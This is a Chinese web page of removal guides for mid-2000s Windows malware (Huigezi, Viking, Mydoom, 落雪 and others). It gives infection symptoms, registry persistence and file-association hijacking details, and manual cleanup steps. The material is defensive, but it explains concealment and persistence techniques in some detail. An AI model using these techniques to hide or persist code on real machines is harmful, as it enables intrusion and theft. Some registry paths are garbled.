电脑病毒清理方法及专杀工具

admin

灰鸽子病毒最新解决方案

灰鸽子病毒英文名为win32.hack.huigezi，这个木马黑客工具大致于2001年出现在互联网，当时被判定为高危木马，经过作者的不懈努力，该病毒从2004年起连续三年荣登国内10大病毒排行榜，至今已经衍生出超过6万个变种。

　　认识灰鸽子：

　　几乎所有人都知道熊猫烧香，就是因为这个病毒有个明显的图标。而灰鸽子木马病毒入侵系统后，只有非常有经验的电脑用户才可能发现异常，普通用户根本毫不知情，就好比有个会隐形术的贼在你家中长驻。

　　灰鸽子病毒的文件名由攻击者任意定制，病毒还可以注入正常程序的进程隐藏自己， Windows的任务管理器看不到病毒存在，需要借助第三方工具软件查看。

　　中灰鸽子病毒后的电脑会被远程攻击者完全控制，具备和你一样的管理权限，远程黑客可以轻易的复制、删除、上传、下载保存在你电脑上的文件，机密文件在你毫不知情的情况下被窃取。病毒还可以记录每一个点击键盘的操作，你的QQ号、网络游戏帐号、网上银行帐号，可以被远程攻击者轻松获得。更变态的是，远程攻击者可以直接控制你的摄像头，把你家里拍个遍。并且，远程攻击者在窃取资料后，还可以远程将病毒卸载，达到销毁证据的目的。这好比隐形的贼在你家拿走东西，大大方方的从隐形的门走出去，而你却根本不知道自己丢了东西。

　　灰鸽子如何传播？

　　灰鸽子自身并不具备传播性，一般通过捆绑的方式进行传播。灰鸽子传播的四大途径：网页传播、邮件传播、IM聊天工具传播、非法软件传播。

　　网页传播：病毒制作者将灰鸽子病毒植入网页中，用户浏览即感染；

　　邮件传播：灰鸽子被捆绑在邮件附件中进行传播；

　　IM聊天工具传播：通过即时聊天工具传播携带灰鸽子的网页链接或文件。

　　非法软件传播：病毒制作者将灰鸽子病毒捆绑进各种非法软件，用户下载解压安装即感染。

　　　　灰鸽子七宗罪

　　1. 盗号

　　灰鸽子入侵用户电脑后，可通过键盘记录器等手段记录用户的键盘输入信息，无论是QQ、网络游戏、网上银行的账号密码都难逃被盗厄运。热门网络游戏魔兽争霸曾发生一个区服大量账号短时间内被盗，引起数千玩家集中投诉;此外，2006年10月，BTV7《生活面对面》节目报道网银账户内1万余元被分15次盗走，警方在事主的电脑查获灰鸽子病毒。

　　2. 偷窥隐私

　　灰鸽子可通过远程控制用户电脑上的摄像头偷窥用户隐私。只要用户的机器处于开机状态，远程操控者就可以自动开启用户的摄像头，窥探用户隐私。知道自己家里隐藏了一只远在千里之外的眼睛，肯定会令你毛骨悚然。

　　3. 敲诈

　　黑客利用灰鸽子病毒完全控制被感染者电脑，电脑中的任何文件都可以任意处置，黑客一旦发现对用户比较隐私或机密的东西，立刻将其转移到其他地方，然后对用户进行勒索，与现实生活中的敲诈一样，利用网络进行偷窃、敲诈的行为同样是违法行为。3月7日，BTV1《法制进行时》曾报道江西瑞金一男子使用木马程序盗走受害人裸照，并向事主索要14万元人民币，最后这名男子以敲诈勒索罪被判有期徒刑6年。

　　4. 发展“肉鸡”

　　电脑被人植入木马，这台主机，就被称为"肉鸡"，远程攻击者可以对这台"肉鸡"电脑为所欲为。攻击者可控制大量"肉鸡"，进行非法获利，比如在"肉鸡"上植入点击广告的软件；利用肉鸡配置代理服务器，以此做为跳板对其它电脑发起入侵。一旦最终受害者追查时，肉鸡电脑将会成为替罪羊；此外，还可以用大量肉鸡组建僵尸网络，随时可以被用于一些特殊目的，比如发起DDoS攻击等。可以想象，如果大量肉鸡被敌对势力控制，将会对我国的网络安全造成什么样的后果。

　　5. 盗取商业机密

　　通过一些非法途径让那些存放商业机密的电脑感染到灰鸽子，接下来，攻击者窃取有价值的商业文件、机密文件、个人隐私数据等等。攻击者可以偷偷将商业文件进行贩卖，充当商业间谍。如果是国家机密因此受损，后果将不堪设想。

　　6. 间断性骚扰

　　感染灰鸽子病毒后，远程攻击者任意玩弄你的电脑，比如任意打开和关闭文档，远程重启电脑，使您无法完成正常任务。

　　7. 恶搞性破坏

　　看谁不顺眼，就可以肆意搞破坏，攻击者可利用灰鸽子对被感染的用户电脑为所欲为，修改注册表、删除重要文件、修改共享、开启代理服务器、下载病毒等等，试想如果你电脑的注册表被恶意篡改、系统文件被删除，而且电脑中还被放了大量病毒，你的电脑将如何？

　　　　预防：

　　灰鸽子病毒泛滥已经数年，变种数万，因为病毒具备很好的隐形特性，让人觉得防不胜防。建议网友注意以下几点：

　　1. 金山毒霸的用户建议使用漏洞扫描修复功能安装系统补丁，在毒霸弹出提醒安装补丁的对话框时，一定要点安装。不是毒霸的用户可以使用Windows Update进行修补。特别注意安装IE浏览器的补丁程序，很多灰鸽子是攻击者故意把病毒放在带漏洞攻击程序的网站上，有漏洞的机器访问这些网站就会中毒。

　　2. 及时升级杀毒软件，注意检查你使用的杀毒软件是否过期，使用盗版杀毒软件（或者一个正版ID用在多台计算机上），是不能正常升级的，特别需要检查。

　　3. 对朋友或陌生人发送来的可疑程序不要运行，别被对方的谎言蒙骗。

　　4. 关闭所有磁盘的自动播放功能，避免插入带毒U盘，移动硬盘，数码存储卡中毒。

　　　　完全解决方案：

　　由于灰鸽子本身的隐蔽性很强，用Windows系统自带的工具，很难发现灰鸽子入侵。那我们如何去发现电脑中已经被植入的灰鸽子病毒呢？

　　1. 金山毒霸数据流杀毒方案

　毒霸2007查杀灰鸽子的操作方法

　　第一步：升级金山毒霸到最新版本。

　　第二步：执行全盘查杀病毒，查杀灰鸽子病毒及全部变种。

　　第三步：确保毒霸实时监控在运行状态，一旦灰鸽子入侵，金山毒霸会及时拦截。

　　


　　图1：金山毒霸2007剿灭灰鸽子病毒

　　2. 灰鸽子病毒专杀工具

　　金山毒霸提供了免费的"灰鸽子"专杀工具，将数据流查杀技术集成到这个专杀工具中，可完全清除各种经过特殊变形处理的灰鸽子病毒。

　　3. 手工杀毒

　　需要借助工具软件：冰刃。一般用户无法根据进程列表看出哪个是病毒，你可以启动冰刃的同时，打开任务管理器，比较一下，看冰刃里多出的一个进程，可能就是灰鸽子病毒。进程名如果是假冒word、记事本的图标，需要重点关注。

　　


　　图2：结束病毒进程

　　选中上图G_server2007进程，单击右键，结束进程。结束进程后，我们直接根据上图冰刃的提示，点冰刃左边的文件，浏览到上图程序名称提示的文件夹，找到g_server2007.exe和g_server2007.DLL（灰鸽子中毒后的文件名各不相同，是由攻击者定制的，应尽可能根据冰刃提示的路径去查找。有的版本带有_hook.dll，可以查看下文件日期，应该是同时生成的。）点击右键，彻底删除掉。

　　


　　图3：彻底删除病毒残留

admin

worm.viking（维金）病毒清除方法

“维金”病毒档案

　　病毒名称: Worm.Viking.m

　　中文名称:

　　维金（又名：威金）

　　威胁级别: ★★★

　　病毒类型: 蠕虫

　　受影响系统:

　　Win 9x/ME,Win 2000/NT,Win XP,Win 2003

　　“维金”病毒五大罪状

　　第一罪:感染系统文件

　　造成系统损坏，且手动清除困难；

　　第二罪:下载恶性木马

　　盗取魔兽、传奇帐号，灰鸽子开后门使系统完全受黑客控制，QQRobber病毒等；

　　第三罪: 多路网络传播方式

　　通过感染文件、局域网共享来传播；

　　第四罪: 强制禁用国内知名反病毒软件

　　降低安全性，易感染其它病毒；

　　第五罪: 变种多

　　数日内，已出现多个变种。 　　

　　“感染系统文件、局域网进行传播且手动清除困难是造成该病毒大面积感染的主要原因”，金山毒霸技术总监陈睿在总结“维金（Worm.Viking.m）”病毒危害时强调。比如：用户A使用了某P2P软件，在该P2P软件共享目录中放置了大量的常用工具软件的安装程序（可执行程序，如：WinRAR、FlashGet等软件的安装程序），当“维金”攻击用户A的系统后就会感染这些安装程序。此时，用户B正好从用户A的共享目录中下载了这些安装程序，如果安装就会感染该病毒。因此，文件感染型病毒，在网络时代中又找到了传播的空间。由于该病毒是一种运行在Windows平台下，集成“可执行文件感染”、“网络感染”、“下载网络木马及其它病毒”的复合型病毒，若用户不幸感染该病毒，将会面临系统瘫痪、网银、网游帐号被盗、重要信息泄漏等多重威胁。　　

　　首先结束rundl132.exe、rundll32.exe、logo_1.exe及其他陌生进程，删除注册表启动项里的病毒键值及相对应文件夹中的病毒文件，再用专杀工具清除病毒（最新版本的瑞星支持查杀此病毒，或者用专杀工具 http://down.ddvip.com/view/1149950811306.html），最后就是删除 _desktop.ini 文件了。该病毒会在每个文件夹中生成一个名为 _desktop.ini 的文件，从硬盘分区搜索不到，一个个文件夹搜索删除又太费劲，因此在这里要用到一个批处理命令 del C:\_desktop.ini /f/s/q/a ，该命令的作用是在杀掉viking病毒之后清理系统内残留的文件，命令解释：　　

　　强制删除d盘下所有目录内（包括d盘本身）的_desktop.ini文件并且不提示是否删除

　/f 强制删除只读文件

　　/q 指定静音状态。不提示您确认删除

　　/s 从当前目录及其所有子目录中删除指定文件。显示正在被删除的文件名

　　/a 是按照属性来删除 　　

　　使用方法是开始/运行/cmd.exe，输入以上命令即可，首先是删除C盘中的 _desktop.ini ，然后依此删除另外分区中的 _desktop.ini 文件。　　

　　至此，该worm.viking病毒对机器造成的影响全部消除！

admin

services.exe病毒木马清除方法详解
1 services.exe - services - 进程介绍
　　进程文件： services or services.exe
　　进程名称： Windows Service Controller
　　进程类别：其他进程
　　英文描述：
　　services.exe is a part of the Microsoft Windows Operating System and manages the operation of starting and stopping services. This process also deals with the automatic starting of services during the computers boot-up and the stopping of servicse durin

　　中文参考：
　　services.exe是微软Windows操作系统的一部分。用于管理启动和停止服务。该进程也会处理在计算机启动和关机时运行的服务。这个程序对你系统的正常运行是非常重要的。注意：services也可能是W32.Randex.R(储存在%systemroot%system32目录)和Sober.P (储存在%systemroot%Connection WizardStatus目录)木马。该木马允许攻击者访问你的计算机，窃取密码和个人数据。该进程的安全等级是建议立即删除。

　　出品者：Microsoft Corp.
　　属于：Microsoft Windows Operating System
　　系统进程：Yes
　　后台程序：Yes
　　网络相关：No
　　常见错误：N/A
　　内存使用：N/A
　　安全等级 (0-5): 0
　　间谍软件：No
　　广告软件：No
　　病毒：No
　　木马：No

　　这个后门还不错，也有点BT吧，共产生14个文件＋3个快捷图标＋2个文件夹。注册表部分，除了1个Run和System.ini，比较有特点是，非普通地利用了EXE文件关联，先修改了.exe的默认值，改.exe从默认的 exefile更改为winfiles，然后再创建winfiles键值，使EXE文件关联与木马挂钩。即为中毒后，任意一个EXE文件的属性，“应用程序”变成“EXE文件”

　　当然，清除的方法也很简单，不过需要注意步骤：

　　一、注册表：先使用注册表修复工具，或者直接使用regedit修正以下部分

　　1.SYSTEM.INI （NT系统在注册表： HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon）
　　shell = Explorer.exe 1 修改为shell = Explorer.exe

　　2.将 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下的
　　Torjan Program----------C:WINNTservices.exe删除

　　3. HKEY_Classes_root.exe
　　默认值 winfiles 改为exefile

　　4.删除以下两个键值：
　　HKEY_Classes_rootwinfiles
HKEY_Local_machinesoftwareclasseswinfiles

　　5. 打开注册表编辑器，依此分别查找“rundll32.com”、“finder.com”、“command.pif”，把找到的内容里面的“rundll32.com”、“finder.com”、“command.pif”分别改为“Rundll32.exe”

　　6. 查找“iexplore.com”的信息，把找到的内容里面的“iexplore.com”改为“iexplore.exe”

　　7. 查找“explorer.com”的信息，把找到的内容里面的“explorer.com”改为“explorer.exe”

　　8. 查找“iexplore.pif”，应该能找到类似“%ProgramFiles%Common Filesiexplore.pif”的信息，把这内容改为“Crogram FilesInternet Exploreriexplore.exe”

　　9. 删除病毒添加的文件关联信息和启动项：
　　[HKEY_CLASSES_ROOTwinfiles]
　　[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
　　"Torjan Program"="%Windows%services.exe"
　　[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices]
　　"Torjan Program"="%Windows%services.exe"
　　[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
　　"Shell"="Explorer.exe 1"
　　改为
　　"Shell"="Explorer.exe"

　　10. 这些是病毒释放的一个VB库文件（MSWINSCK.OCX）的相关信息，不一定要删除：
　　HKEY_CLASSES_ROOTMSWinsock.Winsock
　　HKEY_CLASSES_ROOTMSWinsock.Winsock.1
　　HKEY_CLASSES_ROOTCLSID{248DD896-BB45-11CF-9ABC-0080C7E7B78D}
　　HKEY_CLASSES_ROOTCLSID{248DD897-BB45-11CF-9ABC-0080C7E7B78D}
　　HKEY_CLASSES_ROOTInterface{248DD892-BB45-11CF-9ABC-0080C7E7B78D}
　　HKEY_CLASSES_ROOTInterface{248DD893-BB45-11CF-9ABC-0080C7E7B78D}
　　HKEY_CLASSES_ROOTTypeLib{248DD890-BB45-11CF-9ABC-0080C7E7B78D}

　　注：因为病毒修改了很多关联信息，所以在那些病毒文件没有被删除之前，请不要做任何多余的操作，以免激活病毒

　　二、然后重启系统，删除以下文件部分，注意打开各分区时，先打开“我的电脑”后请使用右键单击分区，选“打开”进入。或者直接执行附件的Kv.bat来删除以下文件

　　c:antorun.inf （如果你有多个分区，请检查其他分区是否有这个文件，有也一并删除）
　　%programfiles%common filesiexplore.pif
　　%programfiles%Internat exploreriexplore.com
　　%windir%1.com
　　%windir%exeroute.exe
　　%windir%explorer.com
　　%windir%finder.com
　　%windir%mswinsck.ocx
　　%windir%services.exe
　　%windir%system32command.pif
　　%windir%system32dxdiag.com
　　%windir%system32finder.com
　　%windir%system32msconfig.com
　　%windir%system32 egedit.com
　　%windir%system32 undll32.com
　　删除以下文件夹：
　　%windir%debug
　　%windir%system32NtmsData

　　一、病毒评估
　　1． 病毒中文名： SCO炸弹变种N
　　2． 病毒英文名： Worm.Novarg.N
　　3． 病毒别名： Worm.Mydoom.m
　　4． 病毒大小： 28832字节
　　5． 病毒类型： 蠕虫病毒
　　6． 病毒危险等级： ★★★★
　　7． 病毒传播途径： 邮件
　　8． 病毒依赖系统： Windows 9X/NT/2000/XP

　　二、病毒的破坏

　　1． 通过电子邮件传播的蠕虫病毒，感染之后，它会先在用户本地机器上搜索电子邮件地址，向其发送病毒邮件；

　　2． 利用在本机上搜索到的邮件地址的后缀当关键词，在Google、Yahoo等四个搜索引擎上搜索相关的email地址，发送病毒邮件传播自身。

　　3． 大量发送的搜索请求使这四个搜索引擎的运行速度明显变慢。

　　4． 感染了此病毒的机器，IE浏览器、OE软件和Outlook软件都不能正常使用。

　　5． 病毒大量向外发送病毒邮件，严重消耗网络资源，可能造成局域网堵塞。

　　三、技术分析

　　1． 蠕虫病毒，采用Upx压缩。运行后，将自己复制到%WINDOWS%目录下，文件名为：java.exe。释放一个后门病毒在同一目录中，文件名为：services.exe。

　　2． 在注册表启动项“CurrentVersionRun”下加入这两个文件的启动键值：JavaVM和Service，实现病毒的开机自启动。

　　3． 强行关闭IE浏览器、OE软件和Outlook软件，使其不能正常使用。

　　4． 在本地机器上搜索电子邮件地址：从注册表中读取当前系统当前使用的wab文件名，并在其中搜索email地址；搜索internet临时目录 （Local SettingsTemporary Internet Files）中的文件，从中提取电子邮件地址；遍历盘符从C:盘到Z:的所有硬盘，并尝试从以下扩展名文件中提取email地址：.adb ，.asp ，.dbx ，.htm ，.php ，.pl ，.sht ，.tbb ，.txt ，.wab。

　　5． 当病毒搜索到email地址以后，病毒以“mailto+%本地系统搜出的邮件地址%”、“reply+%本地系统搜出的邮件地址%”、 “{|contact+| |e| |-| |mail}+%本地系统搜出的邮件地址％”为关键字，利用以下四种搜索引擎进行email地址邮件搜索：search.lycos.com、 search.yahoo.com、www.altavista.com、www.google.com，利用这种手段，病毒能够搜索到非常多的可用邮件 地址。

　　6． 病毒邮件的附件名称为：readme ，instruction ，transcript ，mail ，letter ，file ，text ，attachment等，病毒附件扩展名为：cmd ，bat ，com ，exe ，pif ，scr ，zip。

　　四、病毒解决方案：
　　5. 手动清除
　　（1）结束系统中进程名为：Services.exe和java.exe（在%windows%目录中）
　　（2）删除系统临时目录中的两个病毒数据文件：MLITGB.LOG和ZINCITE.LOG
　　（3）删除病毒键立的注册表键：

　　HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
　　“JavaVM”=%WINDOWS%java.exe

　　和HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
　　“Services”=%WINDOWS%Services.exe

　　注： %WINDOWS% 是指系统的windows目录，在Windows 9X/ME/XP下默认为:
　　C:WINDOWS，Win2K下默认为:C:WINNT

　　注： %WINDIR%指的是Windows系统的安装目录，在Windows 95/98/ME/XP操作系统下默认为：C:WINDOWS目录，在WINDOWS2000操作系统下默认为：C:WINNT目录。

admin

手工清除落雪木马病毒
http://down.ddvip.com/view/11552870794549.html
江民“落雪”病毒专杀工具 V1.1

http://down.ddvip.com/view/11545866824401.html
落雪木马专杀工具

　　病毒介绍：

　　“落雪”顾名思义，就是说中了该木马后，向系统释放的病毒文件非常之多。该木马也叫“游戏大盗”（ Trojan/PSW.GamePass,Trojan.PSW.Snow.a，Troj.LMir2.ky），由VB 程序语言编写，通过 北斗3.1 加壳处理，该木马文件一般是红色图标。

　　病毒运行后，在C盘program file以及windows目录下生成winlogon.exe、regedit.com等14个病毒文件，病毒文件之多比较少见，，事实上这14个不同文件名的病毒文件系同一种文件。病毒文件名被模拟成正常的系统工具名称，但是文件扩展名变成了 .com。江民反病毒工程师分析，这是病毒利用了Windows操作系统执行.com文件的优先级比EXE文件高的特性，这样，当用户调用系统配置文件Msconfig.exe的时候，一般习惯上输入 Msconfig，而这是执行的并不是微软的Msconfig.exe程序，而是病毒文件 Msconfig.com ，病毒作者的“良苦用心”由此可见。病毒另一狡诈之处还有，病毒还创建一名为winlogon.exe的进程，并把 winlogon.exe 的路径指向c:windowswinlogon.exe，而正常的系统进程路径是C:WINDOWSsystem32 winlogon.exe，以此达到迷惑用户的目的。

　　
江民反病毒工程师介绍，除了在C盘下生成很多病毒文件外，病毒还修改注册表文件关联，每当用户点击html文件时，都会运行病毒。此外，病毒还在D盘下生成一个自动运行批处理文件，这样即使C盘目录下的病毒文件被清除，当用户打开D盘时，病毒仍然被激活运行。

　　中毒症状：

　　1：系统运行缓慢。

　　2：右下方任务栏的杀软和防火墙图标消失（被无故关闭）但杀软的右键扫描可用。

　　3：D盘双击打不开，D盘里面有autorun.inf和pagefile.com两个文件，其中autorun.inf为隐藏属性。

　　4：打开任务管理器，可以看到有一个当前用户所属的1.EXE在运行，或者是一个当前用户所属的一个大写的WINLOGON.EXE在运行。

　　5：打开注册表：在运行程序中运行“regedit”，会看到
　　（1）：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 项里有一个Torjan pragramme，这是木马。

　　（2）：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon下的"Shell"="Explorer.exe"已被改为"Shell"="Explorer.exe 1"。

　　6：exe文件打不开（包括杀软，防火墙）。

　　7：开机进入系统时会跳出一个警告框，说文件"1"找不到。（由于杀软查杀后，无法对木马更改的注册表项进行修复）。

　　病毒复活方式：

　　1：在开始－运行里运行：msocnfig，command，regedit这些命令，病毒将全部恢复。

　　2：双击病毒所有文件中的任何一个文件，病毒将完全恢复。

　　3：双击D盘。

　　中毒后对系统的改动：

　　向C盘释放：（其实都是同一个文件）

　　c:windowswinlogon.exe
　　C:WINDOWS1.com
　　C:WINDOWSExERoute.exe
　　C:WINDOWSiexplore.com
　　C:WINDOWSfinder.com
　　C:WINDOWSsystem32command.pif
　　C:Windowssystem32command.com
　　C:WINDOWSsystem32dxdiag.com
　　C:WINDOWSsystem32finder.com
　　C:WINDOWSsystem32MSCONFIG.COM
　　C:WINDOWSsystem32 egedit.com
　　C:WINDOWSsystem32 undll32.com
　　C:WindowsWINLOGON.EXE
　　C: WINDOWSservices.exe
　　C: WINDOWSDebugDebugProgramme.exe
　　C: Program FilesCommon Filesiexplore.com
　　C: Program FilesCommon FilesMicrosoft SharedMSInfomsinfo.rr

　　向D盘释放：

　　D:autorun.inf
　　D:pagefile.com

　　向注册表添加：

　　HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Torjan pragramme
　　HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon下的"Shell"="Explorer.exe"已被改为"Shell"="Explorer.exe 1"。

　　处理方式：

　　一：GHOST法，（建议菜鸟及无手动清除病毒经验者使用）

　　1：先在D盘以外的其他盘新建了两个文本文件，在显示文件名扩展名的情况下，分别改为autorun.inf和pagefile.com，然后拷贝到D盘，覆盖了病毒在D盘的两个病毒源文件，这样这两个文件都可以正常显示了，随即直接删除，也可以在以后删除，D盘毒源就此清除。
　　2：然后GHOST一遍镜像，恢复系统到从前正常状态，至此OK，如果没有镜像，建议在第一步以后重新安装系统。

　　为什么不逐个清理病毒程序：

　　逐个清理病毒文件比较麻烦，操作需要经验加细心，由于病毒文件如上面非常多不小心运行了一个，或在开始－运行里运行msocnfig，command，regedit这些命令，或双击磁盘 ，所有的这些文件全会自己补充回来！并且清理完成后有些后遗症，例如某些文件打不开，IE需要修复等等。

　　二：逐个手动清理法（中途注意不要双击到其中任何一个文件）（必须在文件夹选项里打开显示隐藏文件及显示已知文件扩展名）

　　1：打开始菜单的运行，输入命令 regedit，进注册表，到
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除Torjan pragramme
　　2：然后注销！ 重新进入系统后到D盘（注意不要双击进入！否则又会激活这个病毒）右键，选“打开”，把pagefile.com和D:autorun.inf删掉， 然后再到C盘把上面所列出来的文件都删掉，可以对比其他文件的日期判断。
　　3：头号文件WINLOGON.EXE在C:WindowsWINLOGON.EXE 可能提示删不掉
可以用光盘启动进入DOS模式，把它的系统，隐藏属性去掉然后删除它！

　　手工病毒清除后的系统修复

　　1：把那些病毒文件删掉后，所有的exe文件全都打不开了，运行cmd也不行。
到C:Windowssystem32 里，把cmd.exe文件复制出来，比如到桌面，改名成cmd.com ，然后双击这个COM文件，然后行动可以进入到DOS下的命令提示符。再打入以下的命令：
　　assoc .exe=exefile （assoc与.exe之间有空格）
　　ftype exefile="%1" %*
　　这样exe文件就可以运行了。或者用Regfix.exe，sreng.exe等工具修复,将扩展名EXE改成COM，就可打开。

　　2：开机跳出找不到文件“1.com”
　　在运行程序中运行“regedit”，打开注册表，在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]中
把"Shell"="Explorer.exe 1"恢复为"Shell"="Explorer.exe"

　　3：清除了这个出马出现IE不能下载 请在IE选项 然后安全 然后点默认级别就可以下载了。
　　江民“落雪”病毒专杀工具 V1.1
　　落雪木马专杀工具

admin

灰鸽子手工清除方法
灰鸽子（Backdoor.Huigezi）作者现在还没有停止对灰鸽子的开发，再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳，造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本，但由于变种繁多，还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到，那很可能是中了还没有被截获的新变种。这个时候，就需要手工杀掉灰鸽子。

　　手工清除灰鸽子并不难，重要的是我们必须懂得它的运行原理。

　　灰鸽子的运行原理

　　灰鸽子木马分两部分：客户端和服务端。黑客（姑且这么称呼吧）操纵着客户端，利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个木马（俗称种木马或者开后门）。种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行；也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行；还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……

　　G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

　　Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

　　灰鸽子的手工检测

　　由于灰鸽子拦截了API调用，在正常模式下木马程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

　　但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子木马。

　　由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

　　1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。

　　2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:windows，2k/NT为C:Winnt）。

　　3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。

　　4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。

　　经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了，下面就可以进行手动清除。

　　灰鸽子的手工清除

　　经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

　　注意：为防止误操作，清除前一定要做好备份。

　　一、清除灰鸽子的服务

　　2000／XP系统：

　　1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices注册表项。

　　2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server）。

　　3、删除整个Game_Server项。

　　98／me系统：

　　在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。

　　二、删除灰鸽子程序文件

　　删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子已经被清除干净。

　　小结

　　本文给出了一个手工检测和清除灰鸽子的通用方法，适用于我们看到的大部分灰鸽子木马及其变种，然而仍有极少数变种采用此种方法无法检测和清除。同时，随着灰鸽子新版本的不断推出，作者可能会加入一些新的隐藏方法、防删除手段，手工检测和清除它的难度也会越来越大。当你确定机器中了灰鸽子木马而用本文所述的方法又检测不到时，最好找有经验的朋友帮忙解决。

　　同时随着瑞星杀毒软件2005版产品发布，杀毒软件查杀未知病毒的能力得到了进一步提高。经过瑞星公司研发部门的不断努力，灰鸽子病毒可以被安全有效地自动清除，需要用户手动删除它的机会也将越来越少。

　　病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

admin

explored.exe手动清除方法
　前段时间单位好几台机器病毒大爆发，因为都不是专家高手，折腾了很久才清理掉，过程中有些体会，觉得可以写下来，跟大家作一番交流。

　　首先是病毒的发现。出现了两个症状。

　　一、在局域网上出现广播包(ARP)暴增，甚至把出口堵死。

　　二、机器CPU资源耗尽。

　　用任务管理器可以看到可疑的进程explored.exe和services.exe一起占用CPU近100%(后来才知道，这是因为该病毒是通过服务启动的)，该进程无法停止，注册表键值：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

　　这里有该项存在，即使将该项删除，重启后仍如原样。这个文件是存在在WINDOWS的SYSTEM32目录下，未中毒机器没有该文件。因此可基本确认该进程是病毒。

　　然后是病毒的查杀。这过程中出现两个问题，一是瑞星开始无法升级，这是因为病毒本身把出口堵塞，TCP流无法正常传输。

　　我们尝试了一下，发现可以用防火墙(例如天网)将病毒程序隔离，然后再连网进行升级。第二个问题是瑞星查毒过程缓慢(查毒前已经将网卡先禁用了)，这是因为病毒程序explored占用CPU太狠，在无法设置删除该进程的情况下，可以用任务管理器提高瑞星进程的优先级(比如实时)，这样瑞星从病毒手中抢过CPU资源来正常地运行。

　　不过，这次瑞星只查杀了伪装成svchost.exe的蠕虫病毒，explored仍然存在。

　　我们无可奈何下只好采用很笨的方法删除explored，就是进入安全模式，到Windows的System32目录下直接把该文件删除掉。顺便也把注册表中启动运行那项也删掉了。

